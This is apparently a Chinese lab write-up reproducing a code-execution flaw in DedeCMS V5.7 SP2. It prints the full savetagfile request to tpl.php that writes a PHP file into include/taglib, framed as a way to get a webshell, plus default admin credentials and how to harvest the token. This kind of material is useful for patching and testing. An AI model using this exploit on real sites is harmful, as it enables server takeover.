环境搭建

DeDeCMS官网:http://www.dedecms.com

网站源码版本:DedeCMS V5.7 SP2正式版

程序源码下载:http://www.dedecms.com/products/dedecms/downloads/

默认后台地址:http://127.0.0.1/dede

默认账号密码:admin admin

演示

本地搭建织梦站点

域名后面加上个/dede访问后台,

默认帐号密码admin登录

http://localhost:8080/DedeCMS/uploads/dede/

DedeCMS V5.7 SP2版本中tpl.php存在代码执行,利用这个漏洞在增加新的标签中上传木马 获取Webshell

我们先获取token,访问/dede/tpl.php?action=upload

在该页面中查看源代码获取到token值

访问

http://localhost:8080/DedeCMS/uploads/dede/tpl.php?filename=secquan.lib.php&action=savetagfile&content=<?php phpinfo();?>&token=55ab8c3e67797476fac5a53259f700b6【URL地址+token值自行更换】

然后访问 /include/taglib/secquan.lib.php读取得到phpinfo

http://localhost:8080/DedeCMS/uploads/include/taglib/secquan.lib.php

最后修改:2021 年 03 月 09 日
如果觉得我的文章对你有用,请随意赞赏